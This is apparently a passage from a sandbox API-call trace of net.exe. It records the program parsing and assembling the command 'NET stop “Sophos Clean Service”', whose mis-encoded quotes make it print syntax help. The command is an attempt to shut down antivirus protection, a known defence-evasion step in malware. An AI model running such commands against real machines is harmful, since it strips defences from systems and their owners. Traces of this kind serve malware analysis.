_String2="ΓÇ£Sophos") returned -832 [0199.142] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0199.142] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0199.142] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0199.142] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0199.142] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0199.142] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0199.142] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0199.142] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0199.142] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0199.142] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0199.142] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0199.142] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0199.142] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0199.142] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0199.142] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0199.142] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0199.142] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0199.142] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0199.142] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0199.142] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0199.142] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0199.142] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0199.142] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0199.142] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0199.143] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0199.143] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0199.143] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0199.143] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0199.143] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0199.143] _wcsicmp (_String1="accounts", _String2="Clean") returned -2 [0199.143] _wcsicmp (_String1="computer", _String2="Clean") returned 3 [0199.143] _wcsicmp (_String1="config", _String2="Clean") returned 3 [0199.143] _wcsicmp (_String1="continue", _String2="Clean") returned 3 [0199.143] _wcsicmp (_String1="cont", _String2="Clean") returned 3 [0199.143] _wcsicmp (_String1="file", _String2="Clean") returned 3 [0199.143] _wcsicmp (_String1="files", _String2="Clean") returned 3 [0199.143] _wcsicmp (_String1="group", _String2="Clean") returned 4 [0199.143] _wcsicmp (_String1="groups", _String2="Clean") returned 4 [0199.143] _wcsicmp (_String1="help", _String2="Clean") returned 5 [0199.143] _wcsicmp (_String1="helpmsg", _String2="Clean") returned 5 [0199.143] _wcsicmp (_String1="localgroup", _String2="Clean") returned 9 [0199.143] _wcsicmp (_String1="pause", _String2="Clean") returned 13 [0199.143] _wcsicmp (_String1="session", _String2="Clean") returned 16 [0199.143] _wcsicmp (_String1="sessions", _String2="Clean") returned 16 [0199.143] _wcsicmp (_String1="sess", _String2="Clean") returned 16 [0199.143] _wcsicmp (_String1="share", _String2="Clean") returned 16 [0199.143] _wcsicmp (_String1="start", _String2="Clean") returned 16 [0199.143] _wcsicmp (_String1="stats", _String2="Clean") returned 16 [0199.143] _wcsicmp (_String1="statistics", _String2="Clean") returned 16 [0199.143] _wcsicmp (_String1="stop", _String2="Clean") returned 16 [0199.143] _wcsicmp (_String1="time", _String2="Clean") returned 17 [0199.143] _wcsicmp (_String1="user", _String2="Clean") returned 18 [0199.143] _wcsicmp (_String1="users", _String2="Clean") returned 18 [0199.143] _wcsicmp (_String1="msg", _String2="Clean") returned 10 [0199.143] _wcsicmp (_String1="messenger", _String2="Clean") returned 10 [0199.143] _wcsicmp (_String1="receiver", _String2="Clean") returned 15 [0199.144] _wcsicmp (_String1="rcv", _String2="Clean") returned 15 [0199.144] _wcsicmp (_String1="netpopup", _String2="Clean") returned 11 [0199.144] _wcsicmp (_String1="redirector", _String2="Clean") returned 15 [0199.144] _wcsicmp (_String1="redir", _String2="Clean") returned 15 [0199.144] _wcsicmp (_String1="rdr", _String2="Clean") returned 15 [0199.144] _wcsicmp (_String1="workstation", _String2="Clean") returned 20 [0199.144] _wcsicmp (_String1="work", _String2="Clean") returned 20 [0199.144] _wcsicmp (_String1="wksta", _String2="Clean") returned 20 [0199.144] _wcsicmp (_String1="prdr", _String2="Clean") returned 13 [0199.144] _wcsicmp (_String1="devrdr", _String2="Clean") returned 1 [0199.144] _wcsicmp (_String1="lanmanworkstation", _String2="Clean") returned 9 [0199.144] _wcsicmp (_String1="server", _String2="Clean") returned 16 [0199.144] _wcsicmp (_String1="svr", _String2="Clean") returned 16 [0199.144] _wcsicmp (_String1="srv", _String2="Clean") returned 16 [0199.144] _wcsicmp (_String1="lanmanserver", _String2="Clean") returned 9 [0199.144] _wcsicmp (_String1="alerter", _String2="Clean") returned -2 [0199.144] _wcsicmp (_String1="netlogon", _String2="Clean") returned 11 [0199.144] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0199.144] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.144] wcscpy_s (in: _Destination=0x32f424, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0199.144] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a80000 [0199.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x32f420, nSize=0x0, Arguments=0x32f41c | out: lpBuffer="叠\x8aneth.dll") returned 0xff [0199.147] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0199.147] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.147] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0199.147] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0199.147] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0199.147] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.147] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0199.147] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0199.147] _wcsicmp (_String1="CONT", _String2="Clean") returned 3 [0199.147] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0199.147] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.147] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0199.147] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.147] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0199.147] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.147] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0199.147] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0199.147] _wcsicmp (_String1="FILES", _String2="Clean") returned 3 [0199.148] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0199.148] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.148] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0199.148] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.148] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0199.148] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.148] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0199.148] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0199.148] _wcsicmp (_String1="GROUPS", _String2="Clean") returned 4 [0199.148] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0199.148] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.148] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0199.148] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.148] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0199.148] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.148] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0199.148] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0199.148] _wcsicmp (_String1="REPL", _String2="Clean") returned 15 [0199.148] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0199.148] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0199.148] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.148] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0199.148] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0199.148] _wcsicmp (_String1="REPLICATOR", _String2="Clean") returned 15 [0199.148] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0199.148] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.148] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0199.148] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.148] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0199.148] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.148] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0199.148] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0199.148] _wcsicmp (_String1="SESSIONS", _String2="Clean") returned 16 [0199.148] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0199.148] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0199.149] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.149] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0199.149] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0199.149] _wcsicmp (_String1="SESS", _String2="Clean") returned 16 [0199.149] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0199.149] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.149] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0199.149] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.149] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0199.149] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.149] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0199.149] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0199.149] _wcsicmp (_String1="STATS", _String2="Clean") returned 16 [0199.149] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0199.149] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.149] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0199.149] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.149] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0199.149] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.149] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0199.149] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0199.149] _wcsicmp (_String1="USERS", _String2="Clean") returned 18 [0199.149] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0199.149] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.149] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0199.149] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.149] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0199.149] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.149] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0199.149] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0199.149] _wcsicmp (_String1="REDIRECTOR", _String2="Clean") returned 15 [0199.149] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0199.149] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0199.149] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.149] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0199.149] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0199.150] _wcsicmp (_String1="REDIR", _String2="Clean") returned 15 [0199.150] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0199.150] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0199.150] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.150] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0199.150] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0199.150] _wcsicmp (_String1="RDR", _String2="Clean") returned 15 [0199.150] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0199.150] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0199.150] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.150] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0199.150] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0199.150] _wcsicmp (_String1="WORK", _String2="Clean") returned 20 [0199.150] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0199.150] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0199.150] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.150] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0199.150] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0199.150] _wcsicmp (_String1="WKSTA", _String2="Clean") returned 20 [0199.150] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0199.150] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0199.150] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.150] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0199.150] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0199.150] _wcsicmp (_String1="PRDR", _String2="Clean") returned 13 [0199.150] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0199.150] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0199.150] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.150] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0199.150] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0199.150] _wcsicmp (_String1="DEVRDR", _String2="Clean") returned 1 [0199.150] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0199.150] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.150] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0199.150] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.150] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0199.150] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.151] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0199.151] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0199.151] _wcsicmp (_String1="SVR", _String2="Clean") returned 16 [0199.151] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0199.151] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0199.151] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.151] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0199.151] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0199.151] _wcsicmp (_String1="SRV", _String2="Clean") returned 16 [0199.151] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0199.151] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.151] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x32f420, nSize=0x0, Arguments=0x32f41c | out: lpBuffer="嗨\x8aꔺ瓡") returned 0x1c [0199.151] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0199.151] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0199.151] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0199.151] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0199.151] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.151] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0199.151] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0199.151] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.151] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0199.151] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.151] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0199.151] wcscpy_s (in: _Destination=0x4da4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0199.151] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a00000 [0199.152] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a00000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x4db338, nSize=0x800, Arguments=0x4d9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0199.153] GetFileType (hFile=0x26c) returned 0x3 [0199.153] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x8a3c18 [0199.153] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x8a3c18, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0199.153] WriteFile (in: hFile=0x26c, lpBuffer=0x8a3c18, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x32f400, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f400, lpOverlapped=0x0) returned 0 [0199.153] LocalFree (hMem=0x8a3c18) returned 0x0 [0199.153] GetFileType (hFile=0x26c) returned 0x3 [0199.153] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x8a3920 [0199.153] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x8a3920, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x8a", lpUsedDefaultChar=0x0) returned 2 [0199.153] WriteFile (in: hFile=0x26c, lpBuffer=0x8a3920, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x32f400, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f400, lpOverlapped=0x0) returned 0 [0199.153] LocalFree (hMem=0x8a3920) returned 0x0 [0199.153] wcscpy_s (in: _Destination=0x32f4b8, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0199.154] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0199.154] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0199.154] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0199.154] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0199.154] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0199.154] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="Clean", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Clean") returned 0x0 [0199.154] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Clean", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Clean ") returned 0x0 [0199.154] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Clean ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥") returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a댸M2ѰMɬ") returned 0xad [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minute", _MaxCount=0x23) returned 18 [0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x2e [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD ", _MaxCount=0x23) returned 16 [0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x7d [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT", _MaxCount=0x23) returned 16 [0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x26 [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r", _MaxCount=0x23) returned 16 [0199.154] LocalFree (hMem=0x8a5630) returned 0x0 [0199.154] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x32f400, nSize=0x0, Arguments=0x32f3fc | out: lpBuffer="嘰\x8a⡋瓢2嘰\x8a2") returned 0x19 [0199.154] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Clean ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x23) returned 16 